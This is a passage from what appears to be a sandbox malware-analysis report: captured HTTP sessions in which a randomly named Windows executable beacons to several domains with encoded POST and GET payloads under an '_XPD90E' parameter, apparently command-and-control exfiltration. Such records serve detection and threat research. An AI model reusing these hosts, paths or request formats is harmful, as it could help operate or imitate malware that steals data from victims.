                                                                                                      Data Ascii: _XPD90E=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HLivDxuRegI1i5lD+eTGOnEruxvo2d0VONgJtGL0Hb7JXX1uxF00ZfXPcVSyTso4rLR/1v2n+2q5DCwu888NMmXOALyDOtMHe4RsaYscd24aqMX6wh+sj6g4nTvLmfCCFt5U0dvwFheulT27rjBrQmjy9fYcPxlQnhIHIDvDKkuh/O4DnFeVhEp2nNhZ7QHF/rQ7hn/RJ1UsmJGc0ElV59yWc/6luu434+ybitV5juXkIEvPGZEFcf7f3NFe2lmftksNkciy1hEfOS31NgYp0AdvnjzRBQjB3XuVXMFxWOGiclSWysLdMxhw9bZdSahzivofqAmA8CJUGbFGNWMwCt6Dz38f+4NeqkoLite9xUffRmUeRjs30pvmNFPN6A8uDeMO8/5cldfpu8F6yc3GT3SyU+34a86WBaFbi34iDpBVHYkBhRWKpS+Ym01Z3Wktl5Iu9/GYfb3xkYDXaN8az2JxWCx58+Ucif6fzMp6ElV8QCN2tYQQhaN30e+Ue5S6RDygdGX6tQC/mBOGHWl++xNlxJLtskdWpN1Emc3RbvwBWKosDzYeKVIPeSgPj1twFy9mWwvbd6tjANzk8UmLfyr96BFBh9Q94sXc0E3g84ZK/ntzRmbOAq4c6/oBB7edupk/cXyulu55/HT4/MDIsV691hK5o+oKU1eDYA3GEppw2T3lGRQy3FO+/mVEEtWvf6fASeZx58YmmkSBROYEzVBK/zFPOUII7gv8tD8DqNe+s1MZPz0drgl1eItdnBzKk4MXvkRxFj/Lk48uhUqY9+IHfJe8+yIXVap2yS/VppwAkH05ONgrhZLjQLia8+pmNegiPC8jFXLKsjbDQ/VKfG8Ewf1MIMcOoPINe/jfIETe3inzcqtD/zGgDaT2aiCvDwl4CEHNSKFuyMmxCgno9KjQRsqf+RVyUVlzg2hfAWtBuCN7w1t51hWr+lt0GAWhFvk9 [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:59.418543100 CEST289INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:05:59 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.450027103.71.154.12805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:01.246277094 CEST449OUTGET /jx6k/?_XPD90E=beqWGJ7SP2hkLKuIgnm7ooabSifxwbgOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrAUgG0kgyTvD4QnbATbVShaQ+9re30AjSG1c=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.2925588.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:02.166224957 CEST289INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 22 Oct 2024 07:06:02 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 146
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.4500283.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:07.387543917 CEST712OUTPOST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 38 46 72 75 6b 69 69 62 53 55 77 58 36 6f 64 75 51 70 32 4f 52 73 68 4e 38 50 47 6e 6f 45 70 46 38 53 77 6e 6b 6d 4d 62 2f 69 34 53 6a 56 6d 39 6e 75 63 47 67 61 32 76 2b 32 62 4a 71 2f 65 6d 37 33 72 70 4c 38 50 6a 39 50 4b 53 51 6b 45 37 76 6b 67 4f 5a 51 46 6c 7a 4d 48 31 6d 2b 45 64 63 5a 59 6c 69 48 33 74 65 59 38 35 53 43 4a 5a 53 48 75 79 37 36 7a 6b 31 38 50 72 39 65 78 34 71 57 32 55 43 53 43 43 48 2f 32 35 4d 51 4b 43 79 71 39 4b 57 58 75 6e 4c 62 4a 56 75 63 36 6a 31 2f 56 73 53 55 6c 49 31 62 43 5a 72 58 61 66 69 51 73 6d 6f 6b 72 59 69 33 37 55 44 44 38 64 63 41 3d 3d
                                                                                                      Data Ascii: _XPD90E=8FrukiibSUwX6oduQp2ORshN8PGnoEpF8SwnkmMb/i4SjVm9nucGga2v+2bJq/em73rpL8Pj9PKSQkE7vkgOZQFlzMH1m+EdcZYliH3teY85SCJZSHuy76zk18Pr9ex4qW2UCSCCH/25MQKCyq9KWXunLbJVuc6j1/VsSUlI1bCZrXafiQsmokrYi37UDD8dcA==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.4500293.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:09.936549902 CEST732OUTPOST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 4d 53 6a 33 75 39 31 2f 63 47 6a 61 32 76 6d 47 62 47 6c 66 65 78 37 33 6e 68 4c 35 33 6a 39 50 4f 53 51 6e 51 37 6f 58 49 4a 61 67 46 37 6d 63 47 54 70 65 45 64 63 5a 59 6c 69 44 6d 41 65 59 6b 35 53 54 35 5a 55 6d 75 74 79 61 7a 6e 79 38 50 72 33 4f 78 38 71 57 32 6d 43 54 66 5a 48 39 4f 35 4d 51 36 43 79 2b 52 46 63 58 75 68 47 37 49 6e 71 39 6e 72 36 75 34 43 53 48 49 70 33 36 61 39 6a 78 58 46 7a 68 4e 78 36 6b 50 72 2f 77 79 67 4f 41 42 55 48 48 6b 62 31 74 71 6a 6e 57 37 56 74 4a 74 61 32 35 45 71 34 63 34 3d
                                                                                                      Data Ascii: _XPD90E=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QMSj3u91/cGja2vmGbGlfex73nhL53j9POSQnQ7oXIJagF7mcGTpeEdcZYliDmAeYk5ST5ZUmutyazny8Pr3Ox8qW2mCTfZH9O5MQ6Cy+RFcXuhG7Inq9nr6u4CSHIp36a9jxXFzhNx6kPr/wygOABUHHkb1tqjnW7VtJta25Eq4c4=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.4500303.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:12.481451988 CEST10814OUTPOST /6o8s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      Origin: http://www.wrl-llc.net
                                                                                                      Referer: http://www.wrl-llc.net/6o8s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 55 53 67 46 57 39 6e 4d 30 47 69 61 32 76 34 32 62 46 6c 66 65 73 37 33 76 6c 4c 34 4b 65 39 4e 47 53 54 46 49 37 74 6d 49 4a 4e 77 46 37 2b 73 47 48 6d 2b 45 49 63 61 68 75 69 48 36 41 65 59 6b 35 53 52 68 5a 58 33 75 74 2b 36 7a 6b 31 38 50 4f 39 65 78 45 71 57 75 32 43 54 62 4a 45 4f 47 35 4d 77 71 43 2b 74 70 46 51 58 75 6a 46 37 49 2f 71 39 72 6b 36 75 30 6b 53 47 39 38 33 36 2b 39 68 31 53 53 6d 42 46 78 76 55 72 56 67 58 57 6e 4e 78 34 59 47 67 77 67 2b 38 6d 2b 78 31 44 4d 6c 62 77 72 6e 4d 73 43 6c 34 31 6e 54 4c 37 54 70 32 6a 45 64 4e 69 37 71 33 78 70 33 41 67 54 79 38 2f 65 59 4b 70 50 41 61 78 68 4e 38 4f 35 61 47 35 6e 6a 35 63 72 43 44 31 2f 67 70 37 4a 46 4e 4f 41 37 37 51 4a 51 76 4e 32 2f 4b 77 50 74 42 76 5a 59 4d 4e 6a 67 32 74 36 5a 62 69 47 70 78 30 64 4d 63 64 38 68 65 69 6d 4a 2f 58 78 67 54 6a 74 2f 6f 78 2f 76 48 47 77 71 51 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QUSgFW9nM0Gia2v42bFlfes73vlL4Ke9NGSTFI7tmIJNwF7+sGHm+EIcahuiH6AeYk5SRhZX3ut+6zk18PO9exEqWu2CTbJEOG5MwqC+tpFQXujF7I/q9rk6u0kSG9836+9h1SSmBFxvUrVgXWnNx4YGgwg+8m+x1DMlbwrnMsCl41nTL7Tp2jEdNi7q3xp3AgTy8/eYKpPAaxhN8O5aG5nj5crCD1/gp7JFNOA77QJQvN2/KwPtBvZYMNjg2t6ZbiGpx0dMcd8heimJ/XxgTjt/ox/vHGwqQqzQ2LtRcK+14qDCV6toIYzij8JHBeUb+P8v9RTCONLewr/WTZy/fj3gNh4QNlbd8NteA81SwbzCPoBz2QeBtCgPv+W/KtAmM3kUSGuhoCbY63GQuFTEdUW7+h/UG1fVu2/QEbu25lZgOGlVbKzuL7jyIhzahMunGCyjQqv8SCX4icCcivOk8A436Yu3x39cq9ztjPg3mEeN4m6VSlruYv0fzDlIidOiHovVOXx0z45xmUx4hBYpa6Eoo0uGmzrsLOpLiQDQxkoWlmu9+rIQ2UmB6MFyrGW6Wc00YUVptYc1F+4Bx6WYFO5kGTYHOt+7pwF+6G/+4v02PU2jib05agVrarg7VsIL30X1X/yrzfdzjs2n4zItkBF8mQEvWUnTJMWY8QcSLK17ohDYpDsmqQpc5keIP9fMfAJgW3d1Os7YNxe8IJJDEdxePXFK/qqFDFwXTpNYBjWjPDDtFirSEw8LeGG/U9uydfWdsCupYxsb494N/4C6t5ZEPlsLQEj/b5FG5cXNWxqMdWFO2WXns4HlWMdwsHyqG7LGIAs0z4FRzqaScOLmHVwldm+TA9oph2QXhVd/XNST4APQoneDLYxRab1F+RPbQ5lKRQiVZ1VPbUzJouA82HuKZbCpi5Z+ewFs9hFzLMNM73qD4gZ/1arkWMp2h25mEi5 [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.4500313.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:15.028068066 CEST449OUTGET /6o8s/?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.wrl-llc.net
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:22.737122059 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:06:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5f 58 50 44 39 30 45 3d 78 48 44 4f 6e 58 2b 6c 57 6c 49 45 72 34 68 6d 56 71 37 4a 4b 70 64 36 70 71 79 4f 6b 6c 31 35 38 47 38 42 37 44 49 64 38 54 4d 2f 71 6e 65 50 79 4e 52 58 38 2b 33 69 36 32 61 56 72 39 76 64 6f 47 6e 4b 4d 59 48 6a 39 62 61 4a 56 46 51 30 70 6d 51 66 5a 67 64 7a 2b 6f 58 42 6b 76 63 42 55 4a 77 76 6b 6e 62 71 5a 49 67 77 41 6d 56 65 52 69 4f 45 2b 4d 77 3d 26 71 70 3d 71 54 5a 38 74 32 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=xHDOnX+lWlIEr4hmVq7JKpd6pqyOkl158G8B7DId8TM/qnePyNRX8+3i62aVr9vdoGnKMYHj9baJVFQ0pmQfZgdz+oXBkvcBUJwvknbqZIgwAmVeRiOE+Mw=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.4500323.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:27.799738884 CEST709OUTPOST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 59 7a 43 47 33 72 78 4a 47 66 36 36 66 77 4e 74 43 71 56 65 69 50 63 55 76 4b 57 48 51 2b 5a 4a 4c 2b 6a 69 77 37 54 50 4b 45 64 4d 47 74 7a 5a 51 68 74 53 44 47 33 54 36 57 49 46 68 64 7a 36 67 41 36 50 78 7a 4a 43 59 71 67 48 35 37 66 73 44 67 7a 77 59 4e 66 56 53 55 4c 32 7a 57 74 6b 34 78 52 79 69 78 78 52 63 42 59 50 35 43 4a 75 7a 68 4b 62 46 55 78 6e 76 42 34 48 4f 73 71 65 55 63 55 6a 52 71 64 61 76 38 4e 38 79 6c 79 2f 44 53 54 77 4f 49 44 56 6c 2b 6e 66 70 6e 5a 43 76 66 6b 55 66 77 30 59 58 73 4e 4a 71 31 79 68 51 44 75 77 54 67 3d 3d
                                                                                                      Data Ascii: _XPD90E=n8m4awvF6TmxYzCG3rxJGf66fwNtCqVeiPcUvKWHQ+ZJL+jiw7TPKEdMGtzZQhtSDG3T6WIFhdz6gA6PxzJCYqgH57fsDgzwYNfVSUL2zWtk4xRyixxRcBYP5CJuzhKbFUxnvB4HOsqeUcUjRqdav8N8yly/DSTwOIDVl+nfpnZCvfkUfw0YXsNJq1yhQDuwTg==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.4500333.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:30.343477964 CEST729OUTPOST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 39 4a 4f 72 66 69 78 35 72 50 4c 45 64 4d 4a 39 7a 59 50 78 73 51 44 47 7a 68 36 57 30 46 68 64 50 36 67 45 2b 50 77 46 42 4e 4a 71 67 4a 78 62 66 75 4e 41 7a 77 59 4e 66 56 53 55 50 4d 7a 57 46 6b 34 67 68 79 6b 67 78 51 43 78 59 4d 76 53 4a 75 67 78 4b 66 46 55 77 64 76 44 4d 35 4f 71 32 65 55 59 59 6a 52 37 64 64 36 73 4d 35 76 56 7a 6a 53 42 75 44 4f 72 2b 55 72 4e 50 59 30 6c 46 69 6e 35 70 4f 4f 42 56 50 46 73 70 36 33 79 37 56 64 41 54 35 49 74 43 74 71 47 49 36 71 6c 65 4b 67 75 43 4e 70 4d 4c 7a 55 72 73 3d
                                                                                                      Data Ascii: _XPD90E=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM9JOrfix5rPLEdMJ9zYPxsQDGzh6W0FhdP6gE+PwFBNJqgJxbfuNAzwYNfVSUPMzWFk4ghykgxQCxYMvSJugxKfFUwdvDM5Oq2eUYYjR7dd6sM5vVzjSBuDOr+UrNPY0lFin5pOOBVPFsp63y7VdAT5ItCtqGI6qleKguCNpMLzUrs=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.4500343.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:32.889802933 CEST10811OUTPOST /l5ty/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      Origin: http://www.7fh27o.vip
                                                                                                      Referer: http://www.7fh27o.vip/l5ty/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6e 38 6d 34 61 77 76 46 36 54 6d 78 5a 54 79 47 6e 38 64 4a 48 2f 36 35 51 51 4e 74 5a 36 56 61 69 50 59 55 76 49 36 58 51 4d 31 4a 53 4a 6e 69 78 65 2f 50 49 45 64 4d 4b 39 7a 6a 50 78 73 52 44 47 4b 71 36 57 35 79 68 62 44 36 79 33 32 50 33 77 68 4e 51 36 67 4a 39 37 66 76 44 67 79 34 59 4e 50 76 53 55 2f 4d 7a 57 46 6b 34 69 35 79 79 42 78 51 41 78 59 50 35 43 4a 71 7a 68 4b 37 46 55 70 2f 76 44 4a 43 4f 63 47 65 58 38 30 6a 43 5a 31 64 6e 63 4d 33 73 56 7a 72 53 42 69 63 4f 72 79 69 72 4d 37 2b 30 6e 5a 69 6b 38 59 44 65 77 6c 77 61 63 5a 36 70 46 44 65 55 6e 37 44 4e 61 47 45 73 6b 41 61 70 32 6a 6a 71 66 76 2f 39 63 6a 53 43 4f 63 49 63 52 31 58 76 42 53 56 62 35 6c 54 57 38 36 4f 38 72 4f 56 30 30 77 34 4e 50 67 2f 30 34 6b 59 37 58 53 69 64 57 2f 61 54 59 39 68 72 70 61 48 58 51 6a 4e 4a 70 33 65 65 36 54 4c 37 66 6f 6d 72 75 55 33 6f 52 36 64 57 79 38 63 46 48 69 32 79 67 76 45 63 4c 47 51 51 61 5a 65 6a 32 6b 75 42 59 62 67 51 71 4d 59 6f 74 7a 61 52 37 31 70 61 72 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=n8m4awvF6TmxZTyGn8dJH/65QQNtZ6VaiPYUvI6XQM1JSJnixe/PIEdMK9zjPxsRDGKq6W5yhbD6y32P3whNQ6gJ97fvDgy4YNPvSU/MzWFk4i5yyBxQAxYP5CJqzhK7FUp/vDJCOcGeX80jCZ1dncM3sVzrSBicOryirM7+0nZik8YDewlwacZ6pFDeUn7DNaGEskAap2jjqfv/9cjSCOcIcR1XvBSVb5lTW86O8rOV00w4NPg/04kY7XSidW/aTY9hrpaHXQjNJp3ee6TL7fomruU3oR6dWy8cFHi2ygvEcLGQQaZej2kuBYbgQqMYotzaR71parrwRwMwd4QD1SiNRVPgEbdtSpy5+yFJ4VLk35btfxDvCTJ7ykhcLkMf1Vo8gOZ6aMuWNfSB3nwo+TRAcf9Yiy3A+6tqcAVszy17gqCKCuOt5waCCqqAyR/g0kOW1gKzswFhEcRbHoZI6kNfgLr6N4DcuOY23bw9zzTa0thbQL0nyLYS5NpeKNfJOFHk0XeGHdaCQ4O647jsRR7yloBVdCs41G8QbxlUe4NcC8X7mQY+hyp37NQwaFuKxTi3kNaU2z/5zMZmZ4FtN8sQxHazszWhmvdQzm9+NgK/ghbpkZZZdzFlpc41zSvtuaO/yRt2LOdoiJkBz+/k2WXEUTad/inNCFn/mQnAr1Zrd1l4/JDzVQxWbQll8W+fCi0uaFa2Qy/UXM5C+bcPk6m7DrDmdPsHL2C2f85yH+XyWbDySSDvvxB6fIyUv+yrVE0CmiRFEfmQBLruaem4Sp42cZpArl3dr+UmEfomsn6S1zFWhQFys6sWBdjXZOZVhmEyKn95OXtxafFqAQ9/eLFih1669S28pcPqTULzqmbeDYRLPK5MDJHJBJCgbSl1HVf2P1iyudIT1FE7KoX75sVCaQVrYfiG720KGBeVibZdvUyQKJJ/IoNQj9WqqmMW1IfeHMRSVGrLg7QduTHv2NmGqoL5jzbFQ3bEba43eY+f [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      28192.168.2.4500353.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:06:35.431185961 CEST448OUTGET /l5ty/?_XPD90E=q+OYZAje5TGGPxruqv4Ie4uGL0FJBdVtlfgg+KmPc/5JdZ3+06LBf09NB5PeZCRMfA3Rwmt3pN3KnHXg/BNAIZom36/OATPlTemOBBCw5W17q1Y0x2snJ2U=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.7fh27o.vip
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:06:36.062623978 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:06:35 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
